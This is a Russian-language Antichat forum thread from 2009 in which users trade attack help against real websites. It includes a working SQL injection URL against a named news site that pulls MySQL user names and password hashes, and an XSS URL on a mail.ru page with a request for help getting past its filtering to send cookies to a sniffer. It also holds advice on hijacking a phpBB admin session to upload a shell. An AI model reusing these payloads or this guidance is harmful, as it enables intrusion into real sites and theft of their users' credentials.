Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
17.07.2009, 22:25
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
2la.painkiller +limit+x,1/* x=0....10000
|
|
|
17.07.2009, 22:49
|
|
Новичок
Регистрация: 22.05.2008
Сообщений: 27
Провел на форуме:
80944
Репутация:
0
|
|
ну так без limit должно выводить первое значение.
Мне больше интересен факт почему так?
пс. с лимит тоже не выводит
|
|
|
|
17.07.2009, 22:58
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
2la.painkiller
Базу указывать надо. Таблица в другой базе. И статьи читать ПЕРЕД тем как вопросы задавать.
http://www.mtvindia.com/news/news.php?id=-2983+union+select+1,concat_ws(0x3a,user,password), 3,4,5,6,7,8,9+from+mysql.user/*
|
|
|
|
17.07.2009, 23:07
|
|
Новичок
Регистрация: 22.05.2008
Сообщений: 27
Провел на форуме:
80944
Репутация:
0
|
|
просто всегда срабатывало без базы сразу с таблицы
спс
всем + репу
|
|
|
|
17.07.2009, 23:11
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
Люди, я растроен ппц. нашол xss на сайте с форумом phpbb 2.0.xx
уже написал снифак. но перед этим поставил себе для теста этот форум на локал хост.
узнал что там в куках не хэш админа, а ссесия. причём чтобы войти в админку ссесия не поможет. так что надо вводить пасс. люди пожскажите. может я ошибаюсь. если я получу ссесию админа на phpbb то у меня я так понял не получиться зайти в админку и следовательно залить шелл?
|
|
|
|
17.07.2009, 23:13
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Нет, надо знать пароль, с сессией можешь только творить дела на форуме, которые может творить админ - удалять, читать закрытые разделы и etc.
|
|
|
|
17.07.2009, 23:20
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
Сообщение от nub-hacker
Люди, я растроен ппц. нашол xss на сайте с форумом phpbb 2.0.xx
уже написал снифак. но перед этим поставил себе для теста этот форум на локал хост.
узнал что там в куках не хэш админа, а ссесия. причём чтобы войти в админку ссесия не поможет. так что надо вводить пасс. люди пожскажите. может я ошибаюсь. если я получу ссесию админа на phpbb то у меня я так понял не получиться зайти в админку и следовательно залить шелл?
Если не ошибаюсь - там как бы сессия админа(та что в админ панель после конферма) к IP привязываеться, найти/поднять проксик с его IP(что мне кажеться будет еще сложнее чем покоцать этот форум).
|
|
|
|
18.07.2009, 03:34
|
|
Новичок
Регистрация: 14.06.2009
Сообщений: 4
Провел на форуме:
14667
Репутация:
2
|
|
Сообщение от wolmer
http://torg.mail.ru/337/res/?p3[price_from]=&p3[price_to]=&p3[delivery_id]=&p3[vendor_id][]="> XSS
Собственно подставил ссылку на сниффер но не работает (точнее отчета лога нету) 
Попробуйте ща потестить на своем сниффере... если все норм то дайте ваш запрос чтобы куки просылались (я потом изменю на свой сниффер) так всетаки, как можно обмануть фильтрацию = ?
или как сделать ссылку на сниффер без =
Последний раз редактировалось COOL-J; 18.07.2009 в 03:36..
|
|
|
|
18.07.2009, 21:34
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Сообщение от Scipio
Doom123
1. это происходит когда в коде нет выбора БД перед запросом т.е. нет например такого
Код:
mysql_select_db('mysql');
, а сам sql запрос выглядит например так:
Код:
$sql = "SELECT Host,User,Password FROM mysql.`User` where max_questions=".$id;
т.е. при выборке в FROM указывается не только таблица, но и БД. Когда после этого ты ставишь union select ... from blabla ты не указываешь БД, и поэтому запрос возвращает ошибку что бд не выбрана. Я получал такой же вывод и в пыхадмине, неплохо намудрив с JOIN.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
19.07.2009, 09:49
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
http://forum.antichat.ru/showpost.php?p=1389998&postcount=8135
Помогите по данному вопросу.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
